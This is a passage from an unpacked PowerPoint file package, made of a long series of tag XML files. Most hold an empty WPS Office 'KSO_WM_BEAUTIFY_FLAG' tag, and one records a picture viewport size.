</file>

<file path=ppt/tags/tag271.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag272.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag273.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag274.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag275.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag276.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag277.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag278.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag279.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag28.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag280.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag281.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag282.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag283.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag284.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag285.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag286.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag287.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag288.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag289.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag29.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag290.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag291.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag292.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag293.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag294.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag295.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag296.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag297.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag298.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag299.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag30.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag300.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag301.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag302.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag303.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag304.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag305.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag306.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag307.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag308.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag309.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag31.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag310.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag311.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag312.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag313.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag314.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag315.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag316.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag317.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag318.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag319.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag32.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag320.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag321.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag322.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag323.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag324.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag325.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag326.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag327.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag328.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag329.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag33.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag330.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag331.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag332.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag333.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag334.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag335.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag336.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag337.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag338.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag339.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag34.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag340.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag341.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag342.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_UNIT_PLACING_PICTURE_USER_VIEWPORT" val="{&quot;height&quot;:5655,&quot;width&quot;:8295}"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag343.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag344.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag345.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag346.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag347.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag348.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag349.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag35.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag350.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag351.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag352.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag353.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag354.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag355.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag356.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag357.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag358.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag359.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag36.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag360.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag361.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag362.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag363.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag364.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag365.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag366.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag367.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag368.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag369.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag37.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag370.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag371.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag372.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag373.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag374.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag375.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag376.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
</p:tagLst>
</file>

<file path=ppt/tags/tag377.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
